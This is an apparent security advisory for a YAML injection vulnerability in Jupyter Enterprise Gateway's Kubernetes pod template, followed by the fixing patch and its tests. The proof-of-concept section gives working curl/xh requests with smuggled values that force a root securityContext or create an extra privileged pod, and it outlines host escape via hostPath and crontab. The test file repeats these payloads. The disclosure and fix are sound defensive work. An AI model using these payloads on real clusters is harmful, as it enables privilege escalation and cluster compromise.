VYPR
Critical severity10.0NVD Advisory· Published Jun 3, 2026· Updated Jun 3, 2026

Jupyter Enterprise Gateway: Kubernetes Manifest Injection in Jinja2 Template Rendering

CVE-2026-44182

Description

Summary

The environment variables used during the rendering of the Kubernetes manifest allow YAML injection, enabling attackers to overwrite existing keys like securityContext and inject multi-document YAML to create additional unintended Kubernetes resources.

Details

The server interpolates untrusted environment variables (e.g., KERNEL_XXX) into Kubernetes manifests without YAML-aware escaping, enabling YAML injection attacks. Attackers can inject new fields, overwrite critical fields (e.g., duplicate securityContext keys, where the last one prevails), and inject document boundaries (--- for new documents, ... for end-of-document) to generate multiple resources, potentially creating arbitrary kinds like privileged pods.

The Jinja2 template for the Kubernetes manifest contains several kernel_xxx variables, such as kernel_working_dir that are used when rendering the manifest and are all vectors for YAML injection. https://github.com/jupyter-server/enterprise_gateway/blob/152c20f162f2fab700c04c8830ebf8c1e2e2217a/etc/kernel-launchers/kubernetes/scripts/kernel-pod.yaml.j2#L77

These values come from the environment passed in the API call, where they were KERNEL_XXX before being converted to lowercase.

https://github.com/jupyter-server/enterprise_gateway/blob/152c20f162f2fab700c04c8830ebf8c1e2e2217a/etc/kernel-launchers/kubernetes/scripts/launch_kubernetes.py#L130-L137

PoC

These proof of concepts are injecting in the KERNEL_WORKING_DIR env var, but any of the env vars could have been used. By default, the KERNEL_WORKING_DIR will be ignored unless EG_MIRROR_WORKING_DIRS is truthy for the enterprise-gateway. This is controlled by the mirrorWorkingDirs value in the Helm chart.

Using ducaale/xh:

xh http://localhost:31529/api/kernels env:=@env-working-dir-exploit.yaml

env-working-dir-exploit.yaml:

{
  "KERNEL_POD_NAME": "working-dir-root",
  "KERNEL_NAMESPACE": "notebooks",
  "KERNEL_WORKING_DIR": "\"/tmp\\\"\\n\\n# INJECTION\\n  securityContext:\\n    runAsUser: 0\\n    runAsGroup: 0\\n    fsGroup: 100\\n# HAHA - stray quote \""
}

Resulting request:

POST /api/kernels HTTP/1.1
Accept: application/json, */*;q=0.5
Accept-Encoding: gzip, deflate, br, zstd
Connection: keep-alive
Content-Length: 233
Content-Type: application/json
Host: localhost:31529
User-Agent: xh/0.24.0

{
    "env": {
        "KERNEL_POD_NAME": "working-dir-root",
        "KERNEL_NAMESPACE": "notebooks",
        "KERNEL_WORKING_DIR": "\"/tmp\\\"\\n\\n# INJECTION\\n  securityContext:\\n    runAsUser: 0\\n    runAsGroup: 0\\n    fsGroup: 100\\n# HAHA - stray quote \""
    }
}

Curl equivalent command:

curl http://localhost:31529/api/kernels -H 'content-type: application/json' -H 'accept: application/json, */*;q=0.5' -d '{"env":{"KERNEL_POD_NAME":"working-dir-root","KERNEL_NAMESPACE":"notebooks","KERNEL_WORKING_DIR":"\"/tmp\\\"\\n\\n# INJECTION\\n  securityContext:\\n    runAsUser: 0\\n    runAsGroup: 0\\n    fsGroup: 100\\n# HAHA - stray quote \""}}'

The rendered Jinja2 template:

# This file defines the Kubernetes objects necessary for kernels to run witihin Kubernetes.
# Substitution parameters are processed by the launch_kubernetes.py code located in the
# same directory.  Some values are factory values, while others (typically prefixed with 'kernel_') can be
# provided by the client.
#
# This file can be customized as needed.  No changes are required to launch_kubernetes.py provided kernel_
# values are used - which be automatically set from corresponding KERNEL_ env values.  Updates will be required
# to launch_kubernetes.py if new document sections (i.e., new k8s 'kind' objects) are introduced.
#
apiVersion: v1
kind: Pod
metadata:
  name: "working-dir-root"
  namespace: "notebooks"
  labels:
    kernel_id: "186f4ecf-bf90-40b8-b210-a0987bfce927"
    app: enterprise-gateway
    component: kernel
    source: kernel-pod.yaml
  annotations:
    cluster-autoscaler.kubernetes.io/safe-to-evict: "false"
spec:
  restartPolicy: Never
  serviceAccountName: "default"
# NOTE: that using runAsGroup requires that feature-gate RunAsGroup be enabled.
# WARNING: Only using runAsUser w/o runAsGroup or NOT enabling the RunAsGroup feature-gate
# will result in the new kernel pod's effective group of 0 (root)! although the user will
# correspond to the runAsUser value.  As a result, BOTH should be uncommented AND the feature-gate
# should be enabled to ensure expected behavior.  In addition, 'fsGroup: 100' is recommended so
# that /home/jovyan can be written to via the 'users' group (gid: 100) irrespective of the
# "kernel_uid" and "kernel_gid" values.
  securityContext:
    runAsUser: 1000
    runAsGroup: 100
    fsGroup: 100
  containers:
  - image: "elyra/kernel-py:3.2.3"
    name: "working-dir-root"
    env:
# Add any custom envs here that aren't already configured for the kernel's environment
#    - name: MY_CUSTOM_ENV
#      value: "my_custom_value"
    workingDir: "/tmp"

# INJECTION
  securityContext:
    runAsUser: 0
    runAsGroup: 0
    fsGroup: 100
# HAHA - stray quote "
    volumeMounts:
# Define any "unconditional" mounts here, followed by "conditional" mounts that vary per client
  volumes:
# Define any "unconditional" volumes here, followed by "conditional" volumes that vary per client

Normally the container would run as uid=1000(jovyan) gid=100(users) groups=100(users). This injects a pod securityContext with runAsUser: 0 and runAsGroup: 0 (and fsGroup: 100). The processing of the YAML results in the duplicate key clobbering the original. Making the container run as uid=0(root) gid=0(root) groups=0(root),100(users).

In addition to injecting a pod level securityContext it is also possible to inject a container level securityContext which supports the privileged field.

Injecting a

Pod

By injecting ... and --- it is possible to use multi-document YAML to inject Kubernetes resources.

xh http://localhost:31529/api/kernels env:=@env-working-dir-exploit-pod.yaml

env-working-dir-exploit-pod.yaml:

{
  "KERNEL_POD_NAME": "working-dir-root-pod",
  "KERNEL_NAMESPACE": "notebooks",
  "KERNEL_WORKING_DIR": "\"/tmp\\\"\\n\\n# INJECTION\\n...\\n---\\napiVersion: v1\\nkind: Pod\\nmetadata:\\n  name: injected-pod\\n\\\n  spec:\\n  containers:\\n    - name: injected-container\\n      image: nginx\\n      ports:\\n        - containerPort: 80\\n      securityContext:\\n        privileged: true\\n        runAsUser: 0\\n        runAsGroup: 0\\n...\\n# HAHA - stray quote\""
}

This is rendered as (skipping the beginning of the rendering before the inject):

    workingDir: "/tmp"

# INJECTION
...
---
apiVersion: v1
kind: Pod
metadata:
  name: injected-pod
spec:
  containers:
    - name: injected-container
      image: nginx
      ports:
        - containerPort: 80
      securityContext:
        privileged: true
        runAsUser: 0
        runAsGroup: 0
...
# HAHA - stray quote"
    volumeMounts:
# Define any "unconditional" mounts here, followed by "conditional" mounts that vary per client
  volumes:
# Define any "unconditional" volumes here, followed by "conditional" volumes that vary per client

kubectl get pods -n notebooks `` NAME READY STATUS RESTARTS AGE injected-pod 1/1 Running 0 4s working-dir-root-pod 1/1 Running 0 4s ``

The injected-pod has been created in addition to the working-dir-root-pod.

kubectl get pod/injected-pod -o yaml -n notebooks -o jsonpath='{.spec.containers[*].securityContext}':

{
  "privileged": true,
  "runAsGroup": 0,
  "runAsUser": 0
}

Impact

An attacker can create pods running with arbitrary, image, securityContext, and volumeMounts including hostPath mounts. Privileged pods can be created.

Arbitrary Kubernetes resources of kinds: Pod, Secret, PersistentVolumeClaim, PersistentVolume, Service, and ConfigMap can be created.

Repeated exploitation can compromise all worker nodes, and thus the entire Kubernetes cluster. Multiple container escape vectors exist. It is possible to create privileged pods which could load kernel modules to compromise the host. It is also possible to specify volume mounts, so another vector for a container escape is to use a hostPath R/W volume mount, use the injected securityContext to run as root, and then gain code execution in the underlying worker node by creating a crontab entry in the mounted host file system.

Affected products

1

Patches

3
2258a41f9840

Fix YAML injection via KERNEL_* env vars (GHSA-cfw7-6c5v-2wjq)

https://github.com/jupyter-server/enterprise_gatewayLuciano ResendeApr 28, 2026Fixed in 3.3.0via ghsa-release-walk
7 files changed · +590 45
  • enterprise_gateway/services/kernels/handlers.py+13 7 modified
    @@ -18,6 +18,8 @@
     
     from ...mixins import CORSMixin, JSONErrorsMixin, TokenAuthorizationMixin
     
    +MAX_ENV_VALUE_LENGTH = 4096
    +
     
     class MainKernelHandler(
         TokenAuthorizationMixin, CORSMixin, JSONErrorsMixin, jupyter_server_handlers.MainKernelHandler
    @@ -66,13 +68,17 @@ async def post(self):
                 allowed_envs: list[str]
                 allowed_envs = model["env"].keys() if self.client_envs == ["*"] else self.client_envs
                 # Allow KERNEL_* args and those allowed by configuration.
    -            env.update(
    -                {
    -                    key: value
    -                    for key, value in model["env"].items()
    -                    if key.startswith("KERNEL_") or key in allowed_envs
    -                }
    -            )
    +            for key, value in model["env"].items():
    +                if key.startswith("KERNEL_") or key in allowed_envs:
    +                    if not isinstance(value, str):
    +                        raise tornado.web.HTTPError(
    +                            400, f"Environment variable '{key}' value must be a string"
    +                        )
    +                    if len(value) > MAX_ENV_VALUE_LENGTH:
    +                        raise tornado.web.HTTPError(
    +                            400, f"Environment variable '{key}' exceeds maximum length"
    +                        )
    +                    env[key] = value
     
                 # If kernel_headers are configured, fetch each of those and include in start request
                 kernel_headers = {}
    
  • enterprise_gateway/tests/test_yaml_injection.py+450 0 added
    @@ -0,0 +1,450 @@
    +# Copyright (c) Jupyter Development Team.
    +# Distributed under the terms of the Modified BSD License.
    +"""Tests for YAML injection vulnerability fix (GHSA-cfw7-6c5v-2wjq)."""
    +
    +import os
    +import unittest
    +
    +import yaml
    +from jinja2 import Environment, FileSystemLoader, select_autoescape
    +
    +TEMPLATE_DIR = os.path.join(
    +    os.path.dirname(__file__),
    +    "..",
    +    "..",
    +    "etc",
    +    "kernel-launchers",
    +    "kubernetes",
    +    "scripts",
    +)
    +
    +OPERATOR_TEMPLATE_DIR = os.path.join(
    +    os.path.dirname(__file__),
    +    "..",
    +    "..",
    +    "etc",
    +    "kernel-launchers",
    +    "operators",
    +    "scripts",
    +)
    +
    +YAML_PARSED_KERNEL_VARS = {"KERNEL_VOLUME_MOUNTS", "KERNEL_VOLUMES"}
    +
    +ALLOWED_K8S_KINDS = {
    +    "Pod",
    +    "Secret",
    +    "PersistentVolumeClaim",
    +    "PersistentVolume",
    +    "Service",
    +    "ConfigMap",
    +}
    +
    +
    +def yaml_safe_str(value):
    +    """Escape a value for safe inclusion in a YAML template."""
    +    if isinstance(value, str):
    +        return yaml.dump(value, default_style='"', width=10000).strip()
    +    if isinstance(value, (dict, list)):
    +        return yaml.dump(value, default_flow_style=True, width=10000).strip()
    +    # yaml.dump appends a document-end marker ("...\n") for scalars; strip it
    +    return yaml.dump(value, width=10000).replace("\n...", "").strip()
    +
    +
    +def _build_keywords(env_overrides: dict) -> dict:
    +    """Build a keywords dict from env_overrides using the fixed parsing logic."""
    +    keywords = {}
    +    for name, value in env_overrides.items():
    +        if name.startswith("KERNEL_"):
    +            if name in YAML_PARSED_KERNEL_VARS:
    +                parsed = yaml.safe_load(value)
    +                if isinstance(parsed, list) and all(isinstance(item, dict) for item in parsed):
    +                    keywords[name.lower()] = parsed
    +            else:
    +                keywords[name.lower()] = value
    +    return keywords
    +
    +
    +def _render_pod_template(keywords: dict) -> str:
    +    """Render the kernel-pod.yaml.j2 template with the yaml_safe filter."""
    +    j_env = Environment(
    +        loader=FileSystemLoader(os.path.normpath(TEMPLATE_DIR)),
    +        trim_blocks=True,
    +        lstrip_blocks=True,
    +        autoescape=select_autoescape(
    +            disabled_extensions=("j2", "yaml"),
    +            default_for_string=True,
    +            default=True,
    +        ),
    +    )
    +    j_env.filters["yaml_safe"] = yaml_safe_str
    +    return j_env.get_template("/kernel-pod.yaml.j2").render(**keywords)
    +
    +
    +def _base_env() -> dict:
    +    return {
    +        "KERNEL_POD_NAME": "test-pod",
    +        "KERNEL_NAMESPACE": "default",
    +        "KERNEL_ID": "aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee",
    +        "KERNEL_IMAGE": "elyra/kernel-py:3.2.3",
    +        "KERNEL_SERVICE_ACCOUNT_NAME": "default",
    +        "KERNEL_UID": "1000",
    +        "KERNEL_GID": "100",
    +    }
    +
    +
    +class TestYamlSafeStrFilter(unittest.TestCase):
    +    """Test the yaml_safe_str Jinja2 filter."""
    +
    +    def test_normal_string(self):
    +        result = yaml_safe_str("/home/jovyan")
    +        self.assertEqual(result, '"/home/jovyan"')
    +
    +    def test_string_with_quotes(self):
    +        result = yaml_safe_str('hello "world"')
    +        self.assertIn("hello", result)
    +        parsed = yaml.safe_load(f"key: {result}")
    +        self.assertEqual(parsed["key"], 'hello "world"')
    +
    +    def test_string_with_newlines_escaped(self):
    +        result = yaml_safe_str("line1\nline2\nline3")
    +        self.assertNotIn("\n", result.strip('"'))
    +        parsed = yaml.safe_load(f"key: {result}")
    +        self.assertEqual(parsed["key"], "line1\nline2\nline3")
    +
    +    def test_document_boundary_escaped(self):
    +        result = yaml_safe_str("before\n---\nafter")
    +        parsed_docs = list(yaml.safe_load_all(f"key: {result}"))
    +        self.assertEqual(len(parsed_docs), 1)
    +        self.assertEqual(parsed_docs[0]["key"], "before\n---\nafter")
    +
    +    def test_end_of_document_marker_escaped(self):
    +        result = yaml_safe_str("before\n...\nafter")
    +        parsed = yaml.safe_load(f"key: {result}")
    +        self.assertIn("...", parsed["key"])
    +
    +    def test_none_serialized_as_yaml_null(self):
    +        result = yaml_safe_str(None)
    +        self.assertEqual(result, "null")
    +        parsed = yaml.safe_load(f"key: {result}")
    +        self.assertIsNone(parsed["key"])
    +
    +    def test_bool_serialized_as_yaml_bool(self):
    +        self.assertEqual(yaml_safe_str(True), "true")
    +        self.assertEqual(yaml_safe_str(False), "false")
    +        parsed_true = yaml.safe_load(f"key: {yaml_safe_str(True)}")
    +        parsed_false = yaml.safe_load(f"key: {yaml_safe_str(False)}")
    +        self.assertIs(parsed_true["key"], True)
    +        self.assertIs(parsed_false["key"], False)
    +
    +    def test_numeric_serialized_correctly(self):
    +        self.assertEqual(yaml_safe_str(1000), "1000")
    +        self.assertEqual(yaml_safe_str(3.14), "3.14")
    +        parsed_int = yaml.safe_load(f"key: {yaml_safe_str(1000)}")
    +        parsed_float = yaml.safe_load(f"key: {yaml_safe_str(3.14)}")
    +        self.assertEqual(parsed_int["key"], 1000)
    +        self.assertAlmostEqual(parsed_float["key"], 3.14)
    +
    +    def test_dict_rendered_as_flow_mapping(self):
    +        result = yaml_safe_str({"name": "data", "mountPath": "/data"})
    +        parsed = yaml.safe_load(f"- {result}")
    +        self.assertEqual(parsed[0]["name"], "data")
    +        self.assertEqual(parsed[0]["mountPath"], "/data")
    +
    +    def test_empty_string(self):
    +        result = yaml_safe_str("")
    +        parsed = yaml.safe_load(f"key: {result}")
    +        self.assertEqual(parsed["key"], "")
    +
    +    def test_image_name_with_tag(self):
    +        result = yaml_safe_str("registry.example.com/org/image:v1.2.3")
    +        parsed = yaml.safe_load(f"key: {result}")
    +        self.assertEqual(parsed["key"], "registry.example.com/org/image:v1.2.3")
    +
    +
    +class TestEnvVarParsing(unittest.TestCase):
    +    """Test that env var parsing correctly distinguishes scalar vs structured vars."""
    +
    +    def test_scalar_vars_remain_strings(self):
    +        env = {"KERNEL_IMAGE": "nginx:latest", "KERNEL_UID": "1000"}
    +        keywords = _build_keywords(env)
    +        self.assertEqual(keywords["kernel_image"], "nginx:latest")
    +        self.assertIsInstance(keywords["kernel_image"], str)
    +        self.assertEqual(keywords["kernel_uid"], "1000")
    +        self.assertIsInstance(keywords["kernel_uid"], str)
    +
    +    def test_volume_mounts_parsed_as_list(self):
    +        env = {
    +            "KERNEL_VOLUME_MOUNTS": '[{"name": "data", "mountPath": "/data"}]',
    +        }
    +        keywords = _build_keywords(env)
    +        self.assertIsInstance(keywords["kernel_volume_mounts"], list)
    +        self.assertEqual(keywords["kernel_volume_mounts"][0]["name"], "data")
    +
    +    def test_volumes_parsed_as_list(self):
    +        env = {
    +            "KERNEL_VOLUMES": '[{"name": "data", "emptyDir": {}}]',
    +        }
    +        keywords = _build_keywords(env)
    +        self.assertIsInstance(keywords["kernel_volumes"], list)
    +
    +    def test_non_list_volume_rejected(self):
    +        env = {"KERNEL_VOLUME_MOUNTS": "not-a-list"}
    +        keywords = _build_keywords(env)
    +        self.assertNotIn("kernel_volume_mounts", keywords)
    +
    +    def test_list_of_strings_volume_rejected(self):
    +        """List of strings (not dicts) should be rejected to prevent injection via loop items."""
    +        env = {"KERNEL_VOLUME_MOUNTS": '["name: data\\nmountPath: /data"]'}
    +        keywords = _build_keywords(env)
    +        self.assertNotIn("kernel_volume_mounts", keywords)
    +
    +    def test_mixed_list_volume_rejected(self):
    +        """List containing both dicts and strings should be rejected."""
    +        env = {"KERNEL_VOLUME_MOUNTS": '[{"name": "ok"}, "injected\\nstring"]'}
    +        keywords = _build_keywords(env)
    +        self.assertNotIn("kernel_volume_mounts", keywords)
    +
    +    def test_yaml_safe_load_not_applied_to_scalars(self):
    +        env = {"KERNEL_WORKING_DIR": '"injected\\nvalue"'}
    +        keywords = _build_keywords(env)
    +        self.assertEqual(keywords["kernel_working_dir"], '"injected\\nvalue"')
    +        self.assertNotIn("\n", keywords["kernel_working_dir"])
    +
    +
    +class TestSecurityContextInjection(unittest.TestCase):
    +    """Test that securityContext injection via KERNEL_WORKING_DIR is blocked."""
    +
    +    def test_security_context_not_overridden(self):
    +        env = _base_env()
    +        env["KERNEL_WORKING_DIR"] = (
    +            '"/tmp\\"\\n\\nsecurityContext:\\n  runAsUser: 0\\n  runAsGroup: 0\\n  fsGroup: 100\\n"'
    +        )
    +        keywords = _build_keywords(env)
    +        rendered = _render_pod_template(keywords)
    +        docs = list(yaml.safe_load_all(rendered))
    +
    +        self.assertEqual(len(docs), 1)
    +        sc = docs[0]["spec"]["securityContext"]
    +        self.assertEqual(sc["runAsUser"], 1000)
    +        self.assertEqual(sc["runAsGroup"], 100)
    +
    +    def test_injection_via_kernel_image(self):
    +        env = _base_env()
    +        env["KERNEL_IMAGE"] = 'nginx"\nsecurityContext:\n  runAsUser: 0'
    +        keywords = _build_keywords(env)
    +        rendered = _render_pod_template(keywords)
    +        docs = list(yaml.safe_load_all(rendered))
    +
    +        self.assertEqual(len(docs), 1)
    +        sc = docs[0]["spec"]["securityContext"]
    +        self.assertEqual(sc["runAsUser"], 1000)
    +
    +    def test_injection_via_kernel_namespace(self):
    +        env = _base_env()
    +        env["KERNEL_NAMESPACE"] = 'default"\nsecurityContext:\n  runAsUser: 0'
    +        keywords = _build_keywords(env)
    +        rendered = _render_pod_template(keywords)
    +        docs = list(yaml.safe_load_all(rendered))
    +
    +        self.assertEqual(len(docs), 1)
    +        sc = docs[0]["spec"]["securityContext"]
    +        self.assertEqual(sc["runAsUser"], 1000)
    +
    +    def test_injection_via_volume_mounts_string_list_blocked_at_l1(self):
    +        """L1: list-of-strings in KERNEL_VOLUME_MOUNTS is rejected during parsing."""
    +        env = _base_env()
    +        env["KERNEL_VOLUME_MOUNTS"] = (
    +            '["{name: data, mountPath: /data}\\n  securityContext:\\n    runAsUser: 0"]'
    +        )
    +        keywords = _build_keywords(env)
    +        self.assertNotIn("kernel_volume_mounts", keywords)
    +
    +    def test_injection_via_volume_mounts_blocked_at_l2(self):
    +        """L2: even if a string slips into volume_mounts, yaml_safe filter escapes it."""
    +        env = _base_env()
    +        keywords = _build_keywords(env)
    +        keywords["kernel_volume_mounts"] = [
    +            "{name: data, mountPath: /data}\n  securityContext:\n    runAsUser: 0"
    +        ]
    +        rendered = _render_pod_template(keywords)
    +        docs = list(yaml.safe_load_all(rendered))
    +
    +        self.assertEqual(len(docs), 1)
    +        sc = docs[0]["spec"]["securityContext"]
    +        self.assertEqual(sc["runAsUser"], 1000)
    +        env["KERNEL_WORKING_DIR"] = (
    +            '/tmp\n...\n---\napiVersion: v1\nkind: Pod\nmetadata:\n'
    +            '  name: injected-pod\nspec:\n  containers:\n'
    +            '  - name: evil\n    image: nginx\n    securityContext:\n'
    +            '      privileged: true\n...\n'
    +        )
    +        keywords = _build_keywords(env)
    +        rendered = _render_pod_template(keywords)
    +        docs = [d for d in yaml.safe_load_all(rendered) if d is not None]
    +
    +        self.assertEqual(len(docs), 1, "Injected document should not create extra YAML documents")
    +        self.assertEqual(docs[0]["kind"], "Pod")
    +        self.assertEqual(docs[0]["metadata"]["name"], "test-pod")
    +
    +    def test_all_rendered_kinds_are_allowed(self):
    +        env = _base_env()
    +        keywords = _build_keywords(env)
    +        rendered = _render_pod_template(keywords)
    +        docs = [d for d in yaml.safe_load_all(rendered) if d is not None]
    +
    +        for doc in docs:
    +            self.assertIn(
    +                doc.get("kind"),
    +                ALLOWED_K8S_KINDS,
    +                f"Unexpected kind: {doc.get('kind')}",
    +            )
    +
    +    def test_duplicate_pod_kind_detected(self):
    +        """L3: if an attacker somehow injected a second Pod, document count validation catches it."""
    +        multi_pod_yaml = (
    +            "apiVersion: v1\nkind: Pod\nmetadata:\n  name: legit\n"
    +            "---\n"
    +            "apiVersion: v1\nkind: Pod\nmetadata:\n  name: evil\n"
    +        )
    +        docs = list(yaml.safe_load_all(multi_pod_yaml))
    +        kind_counts: dict[str, int] = {}
    +        for doc in docs:
    +            if doc:
    +                kind = doc.get("kind")
    +                kind_counts[kind] = kind_counts.get(kind, 0) + 1
    +
    +        self.assertEqual(kind_counts.get("Pod"), 2)
    +        self.assertGreater(kind_counts["Pod"], 1, "Should detect duplicate Pod documents")
    +
    +
    +class TestNormalOperation(unittest.TestCase):
    +    """Test that the fix preserves normal kernel launch functionality."""
    +
    +    def test_basic_pod_renders_correctly(self):
    +        env = _base_env()
    +        keywords = _build_keywords(env)
    +        rendered = _render_pod_template(keywords)
    +        docs = list(yaml.safe_load_all(rendered))
    +
    +        self.assertEqual(len(docs), 1)
    +        pod = docs[0]
    +        self.assertEqual(pod["kind"], "Pod")
    +        self.assertEqual(pod["metadata"]["name"], "test-pod")
    +        self.assertEqual(pod["metadata"]["namespace"], "default")
    +        self.assertEqual(pod["spec"]["containers"][0]["image"], "elyra/kernel-py:3.2.3")
    +        self.assertEqual(pod["spec"]["serviceAccountName"], "default")
    +
    +    def test_working_dir_set_correctly(self):
    +        env = _base_env()
    +        env["KERNEL_WORKING_DIR"] = "/home/jovyan/work"
    +        keywords = _build_keywords(env)
    +        rendered = _render_pod_template(keywords)
    +        pod = yaml.safe_load(rendered)
    +
    +        self.assertEqual(pod["spec"]["containers"][0]["workingDir"], "/home/jovyan/work")
    +
    +    def test_resource_limits_rendered(self):
    +        env = _base_env()
    +        env["KERNEL_CPUS"] = "500m"
    +        env["KERNEL_MEMORY"] = "1Gi"
    +        env["KERNEL_CPUS_LIMIT"] = "1"
    +        env["KERNEL_MEMORY_LIMIT"] = "2Gi"
    +        keywords = _build_keywords(env)
    +        rendered = _render_pod_template(keywords)
    +        pod = yaml.safe_load(rendered)
    +
    +        resources = pod["spec"]["containers"][0]["resources"]
    +        self.assertEqual(resources["requests"]["cpu"], "500m")
    +        self.assertEqual(resources["requests"]["memory"], "1Gi")
    +        self.assertEqual(resources["limits"]["cpu"], "1")
    +        self.assertEqual(resources["limits"]["memory"], "2Gi")
    +
    +    def test_security_context_with_uid_gid(self):
    +        env = _base_env()
    +        keywords = _build_keywords(env)
    +        rendered = _render_pod_template(keywords)
    +        pod = yaml.safe_load(rendered)
    +
    +        sc = pod["spec"]["securityContext"]
    +        self.assertEqual(sc["runAsUser"], 1000)
    +        self.assertEqual(sc["runAsGroup"], 100)
    +        self.assertEqual(sc["fsGroup"], 100)
    +
    +    def test_volume_mounts_rendered(self):
    +        env = _base_env()
    +        env["KERNEL_VOLUME_MOUNTS"] = '[{"name": "data-vol", "mountPath": "/data"}]'
    +        env["KERNEL_VOLUMES"] = '[{"name": "data-vol", "emptyDir": {}}]'
    +        keywords = _build_keywords(env)
    +        rendered = _render_pod_template(keywords)
    +        pod = yaml.safe_load(rendered)
    +
    +        mounts = pod["spec"]["containers"][0]["volumeMounts"]
    +        self.assertEqual(len(mounts), 1)
    +        self.assertEqual(mounts[0]["name"], "data-vol")
    +
    +        volumes = pod["spec"]["volumes"]
    +        self.assertEqual(len(volumes), 1)
    +        self.assertEqual(volumes[0]["name"], "data-vol")
    +
    +
    +class TestSparkOperatorTemplate(unittest.TestCase):
    +    """Test that the Spark operator template is also protected."""
    +
    +    def _render_operator_template(self, keywords: dict) -> str:
    +        j_env = Environment(
    +            loader=FileSystemLoader(os.path.normpath(OPERATOR_TEMPLATE_DIR)),
    +            trim_blocks=True,
    +            lstrip_blocks=True,
    +            autoescape=select_autoescape(
    +                disabled_extensions=("j2", "yaml"),
    +                default_for_string=True,
    +                default=True,
    +            ),
    +        )
    +        j_env.filters["yaml_safe"] = yaml_safe_str
    +        return j_env.get_template(
    +            "/sparkoperator.k8s.io-v1beta2.yaml.j2"
    +        ).render(**keywords)
    +
    +    def test_injection_via_kernel_image_blocked(self):
    +        keywords = {
    +            "kernel_resource_name": "test-spark",
    +            "kernel_image": 'nginx\nmalicious:\n  key: value',
    +            "kernel_id": "test-id",
    +            "spark_context_initialization_mode": "none",
    +            "eg_response_address": "1.2.3.4:8080",
    +            "eg_port_range": "0..0",
    +            "eg_public_key": "testkey",
    +            "kernel_service_account_name": "default",
    +            "kernel_executor_image": "elyra/kernel-py:3.2.3",
    +        }
    +        rendered = self._render_operator_template(keywords)
    +        doc = yaml.safe_load(rendered)
    +
    +        self.assertEqual(doc["kind"], "SparkApplication")
    +        self.assertIn("\n", doc["spec"]["image"])
    +        self.assertNotIn("malicious", doc)
    +
    +    def test_normal_spark_app_renders(self):
    +        keywords = {
    +            "kernel_resource_name": "test-spark",
    +            "kernel_image": "elyra/kernel-spark-py:3.2.3",
    +            "kernel_id": "test-id-123",
    +            "spark_context_initialization_mode": "lazy",
    +            "eg_response_address": "10.0.0.1:8080",
    +            "eg_port_range": "10000..11000",
    +            "eg_public_key": "abc123",
    +            "kernel_service_account_name": "spark-sa",
    +            "kernel_executor_image": "elyra/kernel-spark-py:3.2.3",
    +        }
    +        rendered = self._render_operator_template(keywords)
    +        doc = yaml.safe_load(rendered)
    +
    +        self.assertEqual(doc["kind"], "SparkApplication")
    +        self.assertEqual(doc["metadata"]["name"], "test-spark")
    +        self.assertEqual(doc["spec"]["image"], "elyra/kernel-spark-py:3.2.3")
    +        self.assertEqual(doc["spec"]["driver"]["serviceAccount"], "spark-sa")
    +
    +
    +if __name__ == "__main__":
    +    unittest.main()
    
  • etc/kernel-launchers/docker/scripts/launch_docker.py+6 0 modified
    @@ -2,6 +2,7 @@
     
     import argparse
     import os
    +import re
     import sys
     
     import urllib3
    @@ -27,6 +28,11 @@ def launch_docker_kernel(
         if image_name is None:
             sys.exit("ERROR - KERNEL_IMAGE not found in environment - kernel launch terminating!")
     
    +    if not re.match(
    +        r'^[a-zA-Z0-9][a-zA-Z0-9._\-/]*(:[a-zA-Z0-9._\-]+)?(@sha256:[a-f0-9]+)?$', image_name
    +    ):
    +        sys.exit(f"ERROR - KERNEL_IMAGE contains invalid characters: {image_name}")
    +
         # Container name is composed of KERNEL_USERNAME and KERNEL_ID
         container_name = os.environ.get("KERNEL_USERNAME", "") + "-" + kernel_id
     
    
  • etc/kernel-launchers/kubernetes/scripts/kernel-pod.yaml.j2+15 15 modified
    @@ -10,18 +10,18 @@
     apiVersion: v1
     kind: Pod
     metadata:
    -  name: "{{ kernel_pod_name }}"
    -  namespace: "{{ kernel_namespace }}"
    +  name: {{ kernel_pod_name | yaml_safe }}
    +  namespace: {{ kernel_namespace | yaml_safe }}
       labels:
    -    kernel_id: "{{ kernel_id }}"
    +    kernel_id: {{ kernel_id | yaml_safe }}
         app: enterprise-gateway
         component: kernel
         source: kernel-pod.yaml
       annotations:
         cluster-autoscaler.kubernetes.io/safe-to-evict: "false"
     spec:
       restartPolicy: Never
    -  serviceAccountName: "{{ kernel_service_account_name }}"
    +  serviceAccountName: {{ kernel_service_account_name | yaml_safe }}
     # NOTE: that using runAsGroup requires that feature-gate RunAsGroup be enabled.
     # WARNING: Only using runAsUser w/o runAsGroup or NOT enabling the RunAsGroup feature-gate
     # will result in the new kernel pod's effective group of 0 (root)! although the user will
    @@ -40,8 +40,8 @@ spec:
         fsGroup: 100
       {% endif %}
       containers:
    -  - image: "{{ kernel_image }}"
    -    name: "{{ kernel_pod_name }}"
    +  - image: {{ kernel_image | yaml_safe }}
    +    name: {{ kernel_pod_name | yaml_safe }}
         env:
     # Add any custom envs here that aren't already configured for the kernel's environment
     #    - name: MY_CUSTOM_ENV
    @@ -51,42 +51,42 @@ spec:
           {% if kernel_cpus is defined or kernel_memory is defined or kernel_gpus is defined %}
           requests:
             {% if kernel_cpus is defined %}
    -        cpu: "{{ kernel_cpus }}"
    +        cpu: {{ kernel_cpus | yaml_safe }}
             {% endif %}
             {% if kernel_memory is defined %}
    -        memory: "{{ kernel_memory }}"
    +        memory: {{ kernel_memory | yaml_safe }}
             {% endif %}
             {% if kernel_gpus is defined %}
    -        nvidia.com/gpu: "{{ kernel_gpus }}"
    +        nvidia.com/gpu: {{ kernel_gpus | yaml_safe }}
             {% endif %}
           {% endif %}
           {% if kernel_cpus_limit is defined or kernel_memory_limit is defined or kernel_gpus_limit is defined %}
           limits:
             {% if kernel_cpus_limit is defined %}
    -        cpu: "{{ kernel_cpus_limit }}"
    +        cpu: {{ kernel_cpus_limit | yaml_safe }}
             {% endif %}
             {% if kernel_memory_limit is defined %}
    -        memory: "{{ kernel_memory_limit }}"
    +        memory: {{ kernel_memory_limit | yaml_safe }}
             {% endif %}
             {% if kernel_gpus_limit is defined %}
    -        nvidia.com/gpu: "{{ kernel_gpus_limit }}"
    +        nvidia.com/gpu: {{ kernel_gpus_limit | yaml_safe }}
             {% endif %}
           {% endif %}
         {% endif %}
         {% if kernel_working_dir %}
    -    workingDir: "{{ kernel_working_dir }}"
    +    workingDir: {{ kernel_working_dir | yaml_safe }}
         {% endif %}
         volumeMounts:
     # Define any "unconditional" mounts here, followed by "conditional" mounts that vary per client
         {% if kernel_volume_mounts %}
           {% for volume_mount in kernel_volume_mounts %}
    -    - {{ volume_mount }}
    +    - {{ volume_mount | yaml_safe }}
           {% endfor %}
         {% endif %}
       volumes:
